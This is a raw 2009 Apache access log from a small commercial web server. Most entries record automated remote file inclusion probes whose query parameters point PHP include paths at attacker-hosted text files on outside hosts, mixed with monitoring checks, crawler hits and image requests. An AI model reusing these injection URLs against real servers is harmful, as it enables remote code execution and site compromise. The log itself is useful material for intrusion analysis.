124.0.54.130 - - [17/Oct/2009:02:47:11 -0400] "GET /?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:47:11 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:47:11 -0400] "GET /logs/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:47:13 -0400] "GET /logs/error_log.Q109051900%20%20/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:47:13 -0400] "GET /logs/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:47:25 -0400] "GET /logs/access_log.Q109090600%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:47:49 -0400] "GET /logs/access_log.Q109072000%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:47:57 -0400] "GET /logs/access_log.Q109080100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:48:01 -0400] "GET /logs/access_log.Q109061200%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:48:20 -0400] "GET /logs/access_log.Q109062800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
122.199.140.158 - - [17/Oct/2009:02:48:25 -0400] "GET /logs///skin/zero_vote/setup.php?%20dir=http://oktober1.fileave.com/read.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
122.199.140.158 - - [17/Oct/2009:02:48:26 -0400] "GET /logs/access_log.Q109051300///skin/zero_vote/setup.php?%20dir=http://oktober1.fileave.com/read.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.199.140.158 - - [17/Oct/2009:02:48:26 -0400] "GET ///skin/zero_vote/setup.php?%20dir=http://oktober1.fileave.com/read.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:32 -0400] "GET //?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:32 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:32 -0400] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:34 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:34 -0400] "GET //?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:34 -0400] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:48 -0400] "GET //?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:48 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:48 -0400] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:49 -0400] "GET //?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:49 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:02:48:49 -0400] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:02:49:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.54.130 - - [17/Oct/2009:02:49:47 -0400] "GET /?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:49:47 -0400] "GET /logs/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:49:49 -0400] "GET /logs/error_log.Q109051900/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:49:49 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:49:55 -0400] "GET /?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:49:56 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:49:56 -0400] "GET /logs/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:50:10 -0400] "GET /?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:50:10 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:50:10 -0400] "GET /logs/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:02:54:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.102.6.154 - - [17/Oct/2009:02:54:36 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:54:36 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:54:36 -0400] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:54:40 -0400] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:54:40 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:54:40 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.200.116.130 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/prev.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.130 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/items/0032467_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.132 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/cat_expand.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.74 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/items/0032475_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.71 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/items/0032463_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.72 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/items/0032464_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.132 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/cat_link.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.70 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/items/0032462_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.14 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/cat_dot.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.13 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/items/2000107_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.73 - - [17/Oct/2009:02:54:44 -0400] "HEAD /images/items/0032465_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
94.102.6.154 - - [17/Oct/2009:02:54:46 -0400] "GET //?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:54:46 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:54:51 -0400] "GET //?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:54:51 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
72.30.78.230 - - [17/Oct/2009:02:54:55 -0400] "GET /logs/access_log.Q109061600 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.102.6.154 - - [17/Oct/2009:02:55:17 -0400] "GET //admin.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:17 -0400] "GET /logs/access_log.Q109050700//admin.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:17 -0400] "GET /logs//admin.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:21 -0400] "GET //admin.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:21 -0400] "GET /logs/access_log.Q109050700//admin.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:21 -0400] "GET /logs//admin.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:23 -0400] "GET /logs/access_log.Q109052500//admin.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:27 -0400] "GET /logs//admin.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:27 -0400] "GET /logs/access_log.Q109050700%20%20//admin.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:27 -0400] "GET //admin.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:28 -0400] "GET /logs/access_log.Q109052500//admin.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:29 -0400] "GET /logs/access_log.Q109050700%20%20//admin.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:29 -0400] "GET //admin.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:29 -0400] "GET /logs//admin.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:36 -0400] "GET /logs/access_log.Q109052500%20%20//admin.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:55:36 -0400] "GET /logs/access_log.Q109052500%20%20//admin.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:02:56:34 -0400] "GET /errors.php?error=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:02:56:34 -0400] "GET /logs/errors.php?error=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:02:56:34 -0400] "GET /logs/access_log.Q109063000%20%20/errors.php?error=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:02:57:14 -0400] "GET /logs/access_log.Q109063000%20%20/errors.php?error=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:02:57:14 -0400] "GET /logs/errors.php?error=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:02:57:14 -0400] "GET /errors.php?error=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:57:39 -0400] "GET //?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:57:39 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:57:39 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:57:50 -0400] "GET //?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:57:50 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:57:54 -0400] "GET //?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:57:54 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:57:54 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
220.110.168.82 - - [17/Oct/2009:02:57:58 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
220.110.168.82 - - [17/Oct/2009:02:57:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
220.110.168.82 - - [17/Oct/2009:02:58:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
220.110.168.82 - - [17/Oct/2009:02:58:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.6.154 - - [17/Oct/2009:02:58:09 -0400] "GET //?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:58:09 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:02:58:32 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:02:58:32 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:02:58:32 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:02:58:34 -0400] "GET /logs/errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:02:58:34 -0400] "GET /errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:02:58:34 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:02:58:34 -0400] "GET /logs/access_log.Q109080900%20%20/errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:59:17 -0400] "GET /logs/access_log.Q109071300%20%20//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:59:17 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:59:21 -0400] "GET /logs/access_log.Q109071300%20%20//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:59:21 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:59:28 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:02:59:29 -0400] "GET /errors.php?error=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:02:59:29 -0400] "GET /logs/errors.php?error=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:02:59:29 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:59:31 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:02:59:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.155.5.84 - - [17/Oct/2009:02:59:39 -0400] "GET /logs/access_log.Q109071900/errors.php?error=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:00:20 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:00:25 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.92.7.196 - - [17/Oct/2009:03:01:53 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://us.mc841.mail.yahoo.com/mc/welcome?.partner=vz-acs&.gx=1&.tm=1255762920&.rand=ehjclh53j52q7" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
222.73.17.7 - - [17/Oct/2009:03:02:18 -0400] "GET /forgot_password.php?inc_dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:02:18 -0400] "GET /logs/forgot_password.php?inc_dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:02:18 -0400] "GET /logs/access_log.Q109080100%20%20/forgot_password.php?inc_dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:03:03:08 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:03:16 -0400] "GET /logs/access_log.Q109080200%20%20/forgot_password.php?inc_dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
